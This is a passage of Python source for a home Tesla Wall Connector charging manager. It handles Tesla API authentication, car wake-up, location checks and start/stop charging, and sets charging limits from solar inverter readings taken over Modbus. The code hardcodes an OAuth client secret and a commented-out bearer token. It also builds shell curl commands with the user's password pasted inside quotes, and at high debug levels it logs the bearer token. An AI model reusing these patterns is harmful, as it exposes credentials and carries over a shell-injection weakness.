# We're playing fake slave, and we got a message from a master with our TWCID.
# By convention, as a slave we must change our TWCID because a master will not.
fakeTWCID[0] = random.randint(0, 0xFF)
fakeTWCID[1] = random.randint(0, 0xFF)
# Real slaves change their sign during a conflict, so we do too.
slaveSign[0] = random.randint(0, 0xFF)
print(time_now() + ": Master's TWCID matches our fake slave's TWCID. " \
"Picked new random TWCID %02X%02X with sign %02X" % \
(fakeTWCID[0], fakeTWCID[1], slaveSign[0]))
def new_slave(newSlaveID, maxAmps):
global slaveTWCs, slaveTWCRoundRobin
try:
slaveTWC = slaveTWCs[newSlaveID]
# We didn't get KeyError exception, so this slave is already in
# slaveTWCs and we can simply return it.
return slaveTWC
except KeyError:
pass
slaveTWC = TWCSlave(newSlaveID, maxAmps)
slaveTWCs[newSlaveID] = slaveTWC
slaveTWCRoundRobin.append(slaveTWC)
if(len(slaveTWCRoundRobin) > 3):
print("WARNING: More than 3 slave TWCs seen on network. " \
"Dropping oldest: " + hex_str(slaveTWCRoundRobin[0].TWCID) + ".")
delete_slave(slaveTWCRoundRobin[0].TWCID)
return slaveTWC
def delete_slave(deleteSlaveID):
global slaveTWCs, slaveTWCRoundRobin
for i in range(0, len(slaveTWCRoundRobin)):
if(slaveTWCRoundRobin[i].TWCID == deleteSlaveID):
del slaveTWCRoundRobin[i]
break
try:
del slaveTWCs[deleteSlaveID]
except KeyError:
pass
def total_amps_actual_all_twcs():
global debugLevel, slaveTWCRoundRobin, wiringMaxAmpsAllTWCs
totalAmps = 0
for slaveTWC in slaveTWCRoundRobin:
totalAmps += slaveTWC.reportedAmpsActual
if(debugLevel >= 10):
print("Total amps all slaves are using: " + str(totalAmps))
return totalAmps
def car_api_available(email = None, password = None, charge = None):
global debugLevel, carApiLastErrorTime, carApiErrorRetryMins, \
carApiTransientErrors, carApiBearerToken, carApiRefreshToken, \
carApiTokenExpireTime, carApiVehicles
now = time.time()
apiResponseDict = {}
if(now - carApiLastErrorTime < carApiErrorRetryMins*60):
# It's been under carApiErrorRetryMins minutes since the car API
# generated an error. To keep strain off Tesla's API servers, wait
# carApiErrorRetryMins mins till we try again. This delay could be
# reduced if you feel the need. It's mostly here to deal with unexpected
# errors that are hopefully transient.
# https://teslamotorsclub.com/tmc/threads/model-s-rest-api.13410/page-114#post-2732052
# says he tested hammering the servers with requests as fast as possible
# and was automatically blacklisted after 2 minutes. Waiting 30 mins was
# enough to clear the blacklist. So at this point it seems Tesla has
# accepted that third party apps use the API and deals with bad behavior
# automatically.
if(debugLevel >= 11):
print(time_now() + ': Car API disabled for ' +
str(int(carApiErrorRetryMins*60 - (now - carApiLastErrorTime))) +
' more seconds due to recent error.')
return False
# Tesla car API info comes from https://timdorr.docs.apiary.io/
if(carApiBearerToken == '' or carApiTokenExpireTime - now < 30*24*60*60):
cmd = None
apiResponse = b''
# If we don't have a bearer token or our refresh token will expire in
# under 30 days, get a new bearer token. Refresh tokens expire in 45
# days when first issued, so we'll get a new token every 15 days.
if(carApiRefreshToken != ''):
cmd = 'curl -s -m 60 -X POST -H "accept: application/json" -H "Content-Type: application/json" -d \'' + \
json.dumps({'grant_type': 'refresh_token', \
'client_id': '81527cff06843c8634fdc09e8ac0abefb46ac849f38fe1e431c2ef2106796384', \
'client_secret': 'c7257eb71a564034f9419ee651c7d0e5f7aa6bfbd18bafb5c5c033b093bb2fa3', \
'refresh_token': carApiRefreshToken }) + \
'\' "https://owner-api.teslamotors.com/oauth/token"'
elif(email != None and password != None):
cmd = 'curl -s -m 60 -X POST -H "accept: application/json" -H "Content-Type: application/json" -d \'' + \
json.dumps({'grant_type': 'password', \
'client_id': '81527cff06843c8634fdc09e8ac0abefb46ac849f38fe1e431c2ef2106796384', \
'client_secret': 'c7257eb71a564034f9419ee651c7d0e5f7aa6bfbd18bafb5c5c033b093bb2fa3', \
'email': email, 'password': password }) + \
'\' "https://owner-api.teslamotors.com/oauth/token"'
if(cmd != None):
if(debugLevel >= 2):
# Hide car password in output
cmdRedacted = re.sub(r'("password": )"[^"]+"', r'\1[HIDDEN]', cmd)
print(time_now() + ': Car API cmd', cmdRedacted)
apiResponse = run_process(cmd)
# Example response:
# b'{"access_token":"4720d5f980c9969b0ca77ab39399b9103adb63ee832014fe299684201929380","token_type":"bearer","expires_in":3888000,"refresh_token":"110dd4455437ed351649391a3425b411755a213aa815171a2c6bfea8cc1253ae","created_at":1525232970}'
try:
apiResponseDict = json.loads(apiResponse.decode('ascii'))
except json.decoder.JSONDecodeError:
pass
try:
if(debugLevel >= 4):
print(time_now() + ': Car API auth response', apiResponseDict, '\n')
carApiBearerToken = apiResponseDict['access_token']
carApiRefreshToken = apiResponseDict['refresh_token']
carApiTokenExpireTime = now + apiResponseDict['expires_in']
except KeyError:
print(time_now() + ": ERROR: Can't access Tesla car via API. Please log in again via web interface.")
carApiLastErrorTime = now
# Instead of just setting carApiLastErrorTime, erase tokens to
# prevent further authorization attempts until user enters password
# on web interface. I feel this is safer than trying to log in every
# ten minutes with a bad token because Tesla might decide to block
# remote access to your car after too many authorization errors.
carApiBearerToken = ''
carApiRefreshToken = ''
save_settings()
if(carApiBearerToken != ''):
if(len(carApiVehicles) < 1):
cmd = 'curl -s -m 60 -H "accept: application/json" -H "Authorization:Bearer ' + \
carApiBearerToken + \
'" "https://owner-api.teslamotors.com/api/1/vehicles"'
if(debugLevel >= 8):
print(time_now() + ': Car API cmd', cmd)
try:
apiResponseDict = json.loads(run_process(cmd).decode('ascii'))
except json.decoder.JSONDecodeError:
pass
try:
if(debugLevel >= 4):
print(time_now() + ': Car API vehicle list', apiResponseDict, '\n')
for i in range(0, apiResponseDict['count']):
carApiVehicles.append(CarApiVehicle(apiResponseDict['response'][i]['id']))
except (KeyError, TypeError):
# This catches cases like trying to access
# apiResponseDict['response'] when 'response' doesn't exist in
# apiResponseDict.
print(time_now() + ": ERROR: Can't get list of vehicles via Tesla car API. Will try again in "
+ str(carApiErrorRetryMins) + " minutes.")
carApiLastErrorTime = now
return False
if(len(carApiVehicles) > 0):
# Wake cars if needed
needSleep = False
for vehicle in carApiVehicles:
if(charge == True and vehicle.stopAskingToStartCharging):
if(debugLevel >= 8):
print(time_now() + ": Don't charge vehicle " + str(vehicle.ID)
+ " because vehicle.stopAskingToStartCharging == True")
continue
if(now - vehicle.lastErrorTime < carApiErrorRetryMins*60):
# It's been under carApiErrorRetryMins minutes since the car
# API generated an error on this vehicle. Don't send it more
# commands yet.
if(debugLevel >= 8):
print(time_now() + ": Don't send commands to vehicle " + str(vehicle.ID)
+ " because it returned an error in the last "
+ str(carApiErrorRetryMins) + " minutes.")
continue
if(vehicle.ready()):
continue
if(now - vehicle.lastWakeAttemptTime <= vehicle.delayNextWakeAttempt):
if(debugLevel >= 10):
print(time_now() + ": car_api_available returning False because we are still delaying "
+ str(delayNextWakeAttempt) + " seconds after the last failed wake attempt.")
return False
# It's been delayNextWakeAttempt seconds since we last failed to
# wake the car, or it's never been woken. Wake it.
vehicle.lastWakeAttemptTime = now
cmd = 'curl -s -m 60 -X POST -H "accept: application/json" -H "Authorization:Bearer ' + \
carApiBearerToken + \
'" "https://owner-api.teslamotors.com/api/1/vehicles/' + \
str(vehicle.ID) + '/wake_up"'
if(debugLevel >= 8):
print(time_now() + ': Car API cmd', cmd)
try:
apiResponseDict = json.loads(run_process(cmd).decode('ascii'))
except json.decoder.JSONDecodeError:
pass
state = 'error'
try:
if(debugLevel >= 4):
print(time_now() + ': Car API wake car response', apiResponseDict, '\n')
state = apiResponseDict['response']['state']
except (KeyError, TypeError):
# This catches unexpected cases like trying to access
# apiResponseDict['response'] when 'response' doesn't exist
# in apiResponseDict.
state = 'error'
if(state == 'online'):
# With max power saving settings, car will almost always
# report 'asleep' or 'offline' the first time it's sent
# wake_up. Rarely, it returns 'online' on the first wake_up
# even when the car has not been contacted in a long while.
# I suspect that happens when we happen to query the car
# when it periodically awakens for some reason.
vehicle.firstWakeAttemptTime = 0
vehicle.delayNextWakeAttempt = 0
# Don't alter vehicle.lastWakeAttemptTime because
# vehicle.ready() uses it to return True if the last wake
# was under 2 mins ago.
needSleep = True
else:
if(vehicle.firstWakeAttemptTime == 0):
vehicle.firstWakeAttemptTime = now
if(state == 'asleep' or state == 'waking'):
if(now - vehicle.firstWakeAttemptTime <= 10*60):
# http://visibletesla.com has a 'force wakeup' mode
# that sends wake_up messages once every 5 seconds
# 15 times. This generally manages to wake my car if
# it's returning 'asleep' state, but I don't think
# there is any reason for 5 seconds and 15 attempts.
# The car did wake in two tests with that timing,
# but on the third test, it had not entered online
# mode by the 15th wake_up and took another 10+
# seconds to come online. In general, I hear relays
# in the car clicking a few seconds after the first
# wake_up but the car does not enter 'waking' or
# 'online' state for a random period of time. I've
# seen it take over one minute, 20 sec.
#
# I interpret this to mean a car in 'asleep' mode is
# still receiving car API messages and will start
# to wake after the first wake_up, but it may take
# awhile to finish waking up. Therefore, we try
# waking every 30 seconds for the first 10 mins.
vehicle.delayNextWakeAttempt = 30;
elif(now - vehicle.firstWakeAttemptTime <= 70*60):
# Cars in 'asleep' state should wake within a
# couple minutes in my experience, so we should
# never reach this point. If we do, try every 5
# minutes for the next hour.
vehicle.delayNextWakeAttempt = 5*60;
else:
# Car hasn't woken for an hour and 10 mins. Try
# again in 15 minutes. We'll show an error about
# reaching this point later.
vehicle.delayNextWakeAttempt = 15*60;
elif(state == 'offline'):
if(now - vehicle.firstWakeAttemptTime <= 31*60):
# A car in offline state is presumably not connected
# wirelessly so our wake_up command will not reach
# it. Instead, the car wakes itself every 20-30
# minutes and waits some period of time for a
# message, then goes back to sleep. I'm not sure
# what the period of time is, so I tried sending
# wake_up every 55 seconds for 16 minutes but the
# car failed to wake.
# Next I tried once every 25 seconds for 31 mins.
# This worked after 19.5 and 19.75 minutes in 2
# tests but I can't be sure the car stays awake for
# 30secs or if I just happened to send a command
# during a shorter period of wakefulness.
vehicle.delayNextWakeAttempt = 25;
# I've run tests sending wake_up every 10-30 mins to
# a car in offline state and it will go hours
# without waking unless you're lucky enough to hit
# it in the brief time it's waiting for wireless
# commands. I assume cars only enter offline state
# when set to max power saving mode, and even then,
# they don't always enter the state even after 8
# hours of no API contact or other interaction. I've
# seen it remain in 'asleep' state when contacted
# after 16.5 hours, but I also think I've seen it in
# offline state after less than 16 hours, so I'm not
# sure what the rules are or if maybe Tesla contacts
# the car periodically which resets the offline
# countdown.
#
# I've also seen it enter 'offline' state a few
# minutes after finishing charging, then go 'online'
# on the third retry every 55 seconds. I suspect
# that might be a case of the car briefly losing
# wireless connection rather than actually going
# into a deep sleep.
# 'offline' may happen almost immediately if you
# don't have the charger plugged in.
else:
# Handle 'error' state.
if(now - vehicle.firstWakeAttemptTime <= 60*60):
# We've tried to wake the car for less than an
# hour.
foundKnownError = False
if('error' in apiResponseDict):
error = apiResponseDict['error']
for knownError in carApiTransientErrors:
if(knownError == error[0:len(knownError)]):
foundKnownError = True
break
if(foundKnownError):
# I see these errors often enough that I think
# it's worth re-trying in 1 minute rather than
# waiting 5 minutes for retry in the standard
# error handler.
vehicle.delayNextWakeAttempt = 60;
else:
# We're in an unexpected state. This could be caused
# by the API servers being down, car being out of
# range, or by something I can't anticipate. Try
# waking the car every 5 mins.
vehicle.delayNextWakeAttempt = 5*60;
else:
# Car hasn't woken for over an hour. Try again
# in 15 minutes. We'll show an error about this
# later.
vehicle.delayNextWakeAttempt = 15*60;
if(debugLevel >= 1):
if(state == 'error'):
print(time_now() + ": Car API wake car failed with unknown response. " \
"Will try again in "
+ str(vehicle.delayNextWakeAttempt) + " seconds.")
else:
print(time_now() + ": Car API wake car failed. State remains: '"
+ state + "'. Will try again in "
+ str(vehicle.delayNextWakeAttempt) + " seconds.")
if(vehicle.firstWakeAttemptTime > 0
and now - vehicle.firstWakeAttemptTime > 60*60):
# It should never take over an hour to wake a car. If it
# does, ask user to report an error.
print(time_now() + ": ERROR: We have failed to wake a car from '"
+ state + "' state for %.1f hours.\n" \
"Please private message user CDragon at " \
"http://teslamotorsclub.com with a copy of this error. " \
"Also include this: %s" % (
((now - vehicle.firstWakeAttemptTime) / 60 / 60),
str(apiResponseDict)))
if(now - carApiLastErrorTime < carApiErrorRetryMins*60 or carApiBearerToken == ''):
if(debugLevel >= 8):
print(time_now() + ": car_api_available returning False because of recent carApiLasterrorTime "
+ str(now - carApiLastErrorTime) + " or empty carApiBearerToken '"
+ carApiBearerToken + "'")
return False
if(debugLevel >= 8):
# We return True to indicate there was no error that prevents running
# car API commands and that we successfully got a list of vehicles.
# True does not indicate that any vehicle is actually awake and ready
# for commands.
print(time_now() + ": car_api_available returning True")
if(needSleep):
# If you send charge_start/stop less than 1 second after calling
# update_location(), the charge command usually returns:
# {'response': {'result': False, 'reason': 'could_not_wake_buses'}}
# I'm not sure if the same problem exists when sending commands too
# quickly after we send wake_up. I haven't seen a problem sending a
# command immediately, but it seems safest to sleep 5 seconds after
# waking before sending a command.
time.sleep(5);
return True
def car_api_charge(charge):
# Do not call this function directly. Call by using background thread:
# queue_background_task({'cmd':'charge', 'charge':<True/False>})
global debugLevel, carApiLastErrorTime, carApiErrorRetryMins, \
carApiTransientErrors, carApiVehicles, carApiLastStartOrStopChargeTime, \
homeLat, homeLon, onlyChargeMultiCarsAtHome
now = time.time()
apiResponseDict = {}
if(not charge):
# Whenever we are going to tell vehicles to stop charging, set
# vehicle.stopAskingToStartCharging = False on all vehicles.
for vehicle in carApiVehicles:
vehicle.stopAskingToStartCharging = False
if(now - carApiLastStartOrStopChargeTime < 60):
# Don't start or stop more often than once a minute
if(debugLevel >= 8):
print(time_now() + ': car_api_charge return because under 60 sec since last carApiLastStartOrStopChargeTime')
return 'error'
if(car_api_available(charge = charge) == False):
if(debugLevel >= 8):
print(time_now() + ': car_api_charge return because car_api_available() == False')
return 'error'
startOrStop = 'start' if charge else 'stop'
result = 'success'
for vehicle in carApiVehicles:
if(charge and vehicle.stopAskingToStartCharging):
if(debugLevel >= 8):
print(time_now() + ": Don't charge vehicle " + str(vehicle.ID)
+ " because vehicle.stopAskingToStartCharging == True")
continue
if(vehicle.ready() == False):
continue
# Only update carApiLastStartOrStopChargeTime if car_api_available() managed
# to wake cars. Setting this prevents any command below from being sent
# more than once per minute.
carApiLastStartOrStopChargeTime = now
if(onlyChargeMultiCarsAtHome and len(carApiVehicles) > 1):
# When multiple cars are enrolled in the car API, only start/stop
# charging cars parked at home.
if(vehicle.update_location() == False):
result = 'error'
continue
if(homeLat == 10000):
if(debugLevel >= 1):
print(time_now() + ": Home location for vehicles has never been set. " +
"We'll assume home is where we found the first vehicle currently parked. " +
"Home set to lat=" + str(vehicle.lat) + ", lon=" +
str(vehicle.lon))
homeLat = vehicle.lat
homeLon = vehicle.lon
save_settings()
# 1 lat or lon = ~364488.888 feet. The exact feet is different depending
# on the value of latitude, but this value should be close enough for
# our rough needs.
# 1/364488.888 * 10560 = 0.0289.
# So if vehicle is within 0289 lat and lon of homeLat/Lon,
# it's within ~10560 feet (2 miles) of home and we'll consider it to be
# at home.
# I originally tried using 0.00548 (~2000 feet) but one night the car
# consistently reported being 2839 feet away from home despite being
# parked in the exact spot I always park it. This is very odd because
# GPS is supposed to be accurate to within 12 feet. Tesla phone app
# also reports the car is not at its usual address. I suspect this
# is another case of a bug that's been causing car GPS to freeze the
# last couple months.
if(abs(homeLat - vehicle.lat) > 0.0289
or abs(homeLon - vehicle.lon) > 0.0289):
# Vehicle is not at home, so don't change its charge state.
if(debugLevel >= 1):
print(time_now() + ': Vehicle ID ' + str(vehicle.ID) +
' is not at home. Do not ' + startOrStop + ' charge.')
continue
# If you send charge_start/stop less than 1 second after calling
# update_location(), the charge command usually returns:
# {'response': {'result': False, 'reason': 'could_not_wake_buses'}}
# Waiting 2 seconds seems to consistently avoid the error, but let's
# wait 5 seconds in case of hardware differences between cars.
time.sleep(5)
cmd = 'curl -s -m 60 -X POST -H "accept: application/json" -H "Authorization:Bearer ' + \
carApiBearerToken + \
'" "https://owner-api.teslamotors.com/api/1/vehicles/' + \
str(vehicle.ID) + '/command/charge_' + startOrStop + '"'
# Retry up to 3 times on certain errors.
for retryCount in range(0, 3):
if(debugLevel >= 8):
print(time_now() + ': Car API cmd', cmd)
try:
apiResponseDict = json.loads(run_process(cmd).decode('ascii'))
except json.decoder.JSONDecodeError:
pass
try:
if(debugLevel >= 4):
print(time_now() + ': Car API ' + startOrStop + \
' charge response', apiResponseDict, '\n')
# Responses I've seen in apiResponseDict:
# Car is done charging:
# {'response': {'result': False, 'reason': 'complete'}}
# Car wants to charge but may not actually be charging. Oddly, this
# is the state reported when car is not plugged in to a charger!
# It's also reported when plugged in but charger is not offering
# power or even when the car is in an error state and refuses to
# charge.
# {'response': {'result': False, 'reason': 'charging'}}
# Car not reachable:
# {'response': None, 'error_description': '', 'error': 'vehicle unavailable: {:error=>"vehicle unavailable:"}'}
# This weird error seems to happen randomly and re-trying a few
# seconds later often succeeds:
# {'response': {'result': False, 'reason': 'could_not_wake_buses'}}
# I've seen this a few times on wake_up, charge_start, and drive_state:
# {'error': 'upstream internal error', 'response': None, 'error_description': ''}
# I've seen this once on wake_up:
# {'error': 'operation_timedout for txid `4853e3ad74de12733f8cc957c9f60040`}', 'response': None, 'error_description': ''}
# Start or stop charging success:
# {'response': {'result': True, 'reason': ''}}
if(apiResponseDict['response'] == None):
if('error' in apiResponseDict):
foundKnownError = False
error = apiResponseDict['error']
for knownError in carApiTransientErrors:
if(knownError == error[0:len(knownError)]):
# I see these errors often enough that I think
# it's worth re-trying in 1 minute rather than
# waiting carApiErrorRetryMins minutes for retry
# in the standard error handler.
if(debugLevel >= 1):
print(time_now() + ": Car API returned '"
+ error
+ "' when trying to start charging. Try again in 1 minute.")
time.sleep(10) #Was 60s JMS
foundKnownError = True
break
if(foundKnownError):
continue
# This generally indicates a significant error like 'vehicle
# unavailable', but it's not something I think the caller can do
# anything about, so return generic 'error'.
result = 'error'
# Don't send another command to this vehicle for
# carApiErrorRetryMins mins.
vehicle.lastErrorTime = now
elif(apiResponseDict['response']['result'] == False):
if(charge):
reason = apiResponseDict['response']['reason']
if(reason == 'complete' or reason == 'charging'):
# We asked the car to charge, but it responded that
# it can't, either because it's reached target
# charge state (reason == 'complete'), or it's
# already trying to charge (reason == 'charging').
# In these cases, it won't help to keep asking it to
# charge, so set vehicle.stopAskingToStartCharging =
# True.
#
# Remember, this only means at least one car in the
# list wants us to stop asking and we don't know
# which car in the list is connected to our TWC.
if(debugLevel >= 1):
print(time_now() + ': Vehicle ' + str(vehicle.ID)
+ ' is done charging or already trying to charge. Stop asking to start charging.')
vehicle.stopAskingToStartCharging = True
else:
# Car was unable to charge for some other reason, such
# as 'could_not_wake_buses'.
if(reason == 'could_not_wake_buses'):
# This error often happens if you call
# charge_start too quickly after another command
# like drive_state. Even if you delay 5 seconds
# between the commands, this error still comes
# up occasionally. Retrying often succeeds, so
# wait 5 secs and retry.
# If all retries fail, we'll try again in a
# minute because we set
# carApiLastStartOrStopChargeTime = now earlier.
time.sleep(5)
continue
else:
# Start or stop charge failed with an error I
# haven't seen before, so wait
# carApiErrorRetryMins mins before trying again.
print(time_now() + ': ERROR "' + reason + '" when trying to ' +
startOrStop + ' car charging via Tesla car API. Will try again later.' +
"\nIf this error persists, please private message user CDragon at http://teslamotorsclub.com " \
"with a copy of this error.")
result = 'error'
vehicle.lastErrorTime = now
except (KeyError, TypeError):
# This catches cases like trying to access
# apiResponseDict['response'] when 'response' doesn't exist in
# apiResponseDict.
print(time_now() + ': ERROR: Failed to ' + startOrStop
+ ' car charging via Tesla car API. Will try again later.')
vehicle.lastErrorTime = now
break
if(debugLevel >= 1 and carApiLastStartOrStopChargeTime == now):
print(time_now() + ': Car API ' + startOrStop + ' charge result: ' + result)
return result
def queue_background_task(task):
global backgroundTasksQueue, backgroundTasksCmds
if(task['cmd'] in backgroundTasksCmds):
# Some tasks, like cmd='charge', will be called once per second until
# a charge starts or we determine the car is done charging. To avoid
# wasting memory queing up a bunch of these tasks when we're handling
# a charge cmd already, don't queue two of the same task.
return
# Insert task['cmd'] in backgroundTasksCmds to prevent queuing another
# task['cmd'] till we've finished handling this one.
backgroundTasksCmds[task['cmd']] = True
# Queue the task to be handled by background_tasks_thread.
backgroundTasksQueue.put(task)
def background_tasks_thread():
global backgroundTasksQueue, backgroundTasksCmds, carApiLastErrorTime
while True:
task = backgroundTasksQueue.get()
if(task['cmd'] == 'charge'):
# car_api_charge does nothing if it's been under 60 secs since it
# was last used so we shouldn't have to worry about calling this
# too frequently.
car_api_charge(task['charge'])
elif(task['cmd'] == 'carApiEmailPassword'):
carApiLastErrorTime = 0
car_api_available(task['email'], task['password'])
elif(task['cmd'] == 'checkGreenEnergy'):
check_green_energy()
# Delete task['cmd'] from backgroundTasksCmds such that
# queue_background_task() can queue another task['cmd'] in the future.
del backgroundTasksCmds[task['cmd']]
# task_done() must be called to let the queue know the task is finished.
# backgroundTasksQueue.join() can then be used to block until all tasks
# in the queue are done.
backgroundTasksQueue.task_done()
def check_green_energy():
global debugLevel, maxAmpsToDivideAmongSlaves, greenEnergyAmpsOffset, \
minAmpsPerTWC, backgroundTasksLock
# I check solar panel generation using an API exposed by The
# Energy Detective (TED). It's a piece of hardware available
# at http://www. theenergydetective.com
# You may also be able to find a way to query a solar system
# on the roof using an API provided by your solar installer.
# Most of those systems only update the amount of power the
# system is producing every 15 minutes at most, but that's
# fine for tweaking your car charging.
#
# In the worst case, you could skip finding realtime green
# energy data and simply direct the car to charge at certain
# rates at certain times of day that typically have certain
# levels of solar or wind generation. To do so, use the hour
# and min variables as demonstrated just above this line:
# backgroundTasksQueue.put({'cmd':'checkGreenEnergy')
#
# The curl command used below can be used to communicate
# with almost any web API, even ones that require POST
# values or authentication. The -s option prevents curl from
# displaying download stats. -m 60 prevents the whole
# operation from taking over 60 seconds.
#greenEnergyData = run_process('curl -s -m 60 "http://192.168.13.58/history/export.csv?T=1&D=0&M=1&C=1"')
Photovoltaic = 0
SmartMeter=0
HouseBatt= 0
#url_string = 'http://grafa.my-router.de:8086/write?db=iobroker'
#url_string = 'http://grafa.my-router.de:8086/write?db=iobroker'
url_string = 'http://192.168.0.4:8086/write?db=iobroker'
data_string = 'TWCMagager.CurrentChargingPower,from=TWCManager value=' + str(total_amps_actual_all_twcs()*225)
#myToken = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InBpIiwiZXhwIjoyMjM4ODgzMjAwfQ.xOwi_jQTLG2T41PF3NT54pKfpTAFfNFl6WldoivzwP8'
#header_string = {'Authorization': 'Bearer {}'.format(myToken)}
ip='192.168.0.70' #This is the ip from your inverter being connected via TCP Modb
client = ModbusClient(ip,port=502)
try:
client.connect()
Photovoltaic = int(BinaryPayloadDecoder.fromRegisters(client.read_holding_registers(40092-1,2,unit=1).registers, byteorder=Endian.Big, wordorder=Endian.Big).decode_32bit_float())
SmartMeter = int(BinaryPayloadDecoder.fromRegisters(client.read_holding_registers(40098-1,2,unit=240).registers, byteorder=Endian.Big, wordorder=Endian.Big).decode_32bit_float())
#Fix this by reading from influxdb or something else
#HouseBatt = run_process('curl -s -m 5 "http://192.168.0.21:8087/getPlainValue/vis.0.Batt_Discharge"') #DIY Powerwall
# req.post(url_string, data=data_string, headers=header_string)
req.post(url_string, data=data_string)
except:
print('Failed to read Greenenergy')
pass
client.close()
# MTU, Time, Power, Cost, Voltage
# Solar,11/11/2017 14:20:43,-2.957,-0.29,124.3
# The only part we care about is -2.957 which is negative
# kW currently being generated. When 0kW is generated, the
# negative disappears so we make it optional in the regex
# below.
#m = re.search(b'^Solar,[^,]+,-?([^, ]+),', greenEnergyData, re.MULTILINE)
SmartMeter = -int(SmartMeter) # - means surplus
HouseBatt = int(float(HouseBatt)) #If Powerwall discharges, subtract this from surplus
greenEnergyData = SmartMeter - HouseBatt + total_amps_actual_all_twcs()*225
if greenEnergyData > int(Photovoltaic) :
greenEnergyData = int(Photovoltaic) #If for some time isses, limit
print("Smarmeter %d Housebatt %d "% (SmartMeter,HouseBatt))
m = int(greenEnergyData)
if(m):
#solarW = int(float(m.group(1))+1000)
solarW = m
# Use backgroundTasksLock to prevent changing maxAmpsToDivideAmongSlaves
# if the main thread is in the middle of examining and later using
# that value.
backgroundTasksLock.acquire()
# Watts = Volts * Amps
# Car charges at 240 volts in North America so we figure
# out how many amps * 240 = solarW and limit the car to
# that many amps.
maxAmpsToDivideAmongSlaves = (solarW / 225) + \
greenEnergyAmpsOffset
if(debugLevel >= 1):
print("%s: Solar generating %dW so limit car charging to:\n" \
" %.2fA + %.2fA = %.2fA. Charge when above %.0fA (minAmpsPerTWC)." % \
(time_now(), solarW, (solarW / 225),
greenEnergyAmpsOffset, maxAmpsToDivideAmongSlaves,
minAmpsPerTWC))
backgroundTasksLock.release()
else:
print(time_now() +
" ERROR: Can't determine current solar generation from:\n" +
str(greenEnergyData))
#
# End functions
#
##############################
##############################
#
# Begin CarApiVehicle class
#
class CarApiVehicle:
ID = None
firstWakeAttemptTime = 0
lastWakeAttemptTime = 0
delayNextWakeAttempt = 0
lastErrorTime = 0
stopAskingToStartCharging = False
lat = 10000
lon = 10000
def __init__(self, ID):
self.ID = ID
def ready(self):
global carApiLastErrorTime, carApiErrorRetryMins
if(time.time() - self.lastErrorTime < carApiErrorRetryMins*60):
# It's been under carApiErrorRetryMins minutes since the car API
# generated an error on this vehicle. Return that car is not ready.
if(debugLevel >= 8):
print(time_now() + ': Vehicle ' + str(self.ID)
+ ' not ready because of recent lastErrorTime '
+ str(self.lastErrorTime))
return False
if(self.firstWakeAttemptTime == 0 and time.time() - self.lastWakeAttemptTime < 2*60):
# Less than 2 minutes since we successfully woke this car, so it
# should still be awake. Tests on my car in energy saver mode show
# it returns to sleep state about two minutes after the last command
# was issued. Times I've tested: 1:35, 1:57, 2:30
return True
if(debugLevel >= 8):
print(time_now() + ': Vehicle ' + str(self.ID)
+ " not ready because it wasn't woken in the last 2 minutes.")
return False
def update_location(self):
global carApiLastErrorTime, carApiTransientErrors
if(self.ready() == False):
return False
apiResponseDict = {}
cmd = 'curl -s -m 60 -H "accept: application/json" -H "Authorization:Bearer ' + \
carApiBearerToken + \
'" "https://owner-api.teslamotors.com/api/1/vehicles/' + \
str(self.ID) + '/data_request/drive_state"'
# Retry up to 3 times on certain errors.
for retryCount in range(0, 3):
if(debugLevel >= 8):
print(time_now() + ': Car API cmd', cmd)
try:
apiResponseDict = json.loads(run_process(cmd).decode('ascii'))
# This error can happen here as well:
# {'response': {'reason': 'could_not_wake_buses', 'result': False}}
# This one is somewhat common:
# {'response': None, 'error': 'vehicle unavailable: {:error=>"vehicle unavailable:"}', 'error_description': ''}
except json.decoder.JSONDecodeError:
pass
try:
if(debugLevel >= 4):
print(time_now() + ': Car API vehicle GPS location', apiResponseDict, '\n')
if('error' in apiResponseDict):
foundKnownError = False
error = apiResponseDict['error']
for knownError in carApiTransientErrors:
if(knownError == error[0:len(knownError)]):
# I see these errors often enough that I think
# it's worth re-trying in 1 minute rather than
# waiting carApiErrorRetryMins minutes for retry
# in the standard error handler.
if(debugLevel >= 1):
print(time_now() + ": Car API returned '"
+ error
+ "' when trying to get GPS location. Try again in 1 minute.")
time.sleep(10) #Was 60 JMS
foundKnownError = True
break
if(foundKnownError):
continue
response = apiResponseDict['response']
# A successful call to drive_state will not contain a
# response['reason'], so we check if the 'reason' key exists.
if('reason' in response and response['reason'] == 'could_not_wake_buses'):
# Retry after 5 seconds. See notes in car_api_charge where
# 'could_not_wake_buses' is handled.
time.sleep(5)
continue
self.lat = response['latitude']
self.lon = response['longitude']
except (KeyError, TypeError):
# This catches cases like trying to access
# apiResponseDict['response'] when 'response' doesn't exist in
# apiResponseDict.
if(debugLevel >= 1):
print(time_now() + ": ERROR: Can't get GPS location of vehicle " + str(self.ID) + \
". Will try again later.")
self.lastErrorTime = time.time()
return False
return True
#
# End CarApiVehicle class
#
##############################
##############################
#
# Begin TWCSlave class
#
class TWCSlave:
TWCID = None
maxAmps = None
# Protocol 2 TWCs tend to respond to commands sent using protocol 1, so
# default to that till we know for sure we're talking to protocol 2.
protocolVersion = 1
minAmpsTWCSupports = 6
masterHeartbeatData = bytearray(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00')
timeLastRx = time.time()
# reported* vars below are reported to us in heartbeat messages from a Slave
# TWC.
reportedAmpsMax = 0
reportedAmpsActual = 0
reportedState = 0
# reportedAmpsActual frequently changes by small amounts, like 5.14A may
# frequently change to 5.23A and back.
# reportedAmpsActualSignificantChangeMonitor is set to reportedAmpsActual
# whenever reportedAmpsActual is at least 0.8A different than
# reportedAmpsActualSignificantChangeMonitor. Whenever
# reportedAmpsActualSignificantChangeMonitor is changed,
# timeReportedAmpsActualChangedSignificantly is set to the time of the
# change. The value of reportedAmpsActualSignificantChangeMonitor should not
# be used for any other purpose. timeReportedAmpsActualChangedSignificantly
# is used for things like preventing start and stop charge on a car more
# than once per minute.
reportedAmpsActualSignificantChangeMonitor = -1
timeReportedAmpsActualChangedSignificantly = time.time()
lastAmpsOffered = -1
timeLastAmpsOfferedChanged = time.time()
lastHeartbeatDebugOutput = ''
timeLastHeartbeatDebugOutput = 0
wiringMaxAmps = wiringMaxAmpsPerTWC
def __init__(self, TWCID, maxAmps):
self.TWCID = TWCID
self.maxAmps = maxAmps
def print_status(self, heartbeatData):
global fakeMaster, masterTWCID
try:
debugOutput = ": SHB %02X%02X: %02X %05.2f/%05.2fA %02X%02X" % \
(self.TWCID[0], self.TWCID[1], heartbeatData[0],
(((heartbeatData[3] << 8) + heartbeatData[4]) / 100),
(((heartbeatData[1] << 8) + heartbeatData[2]) / 100),
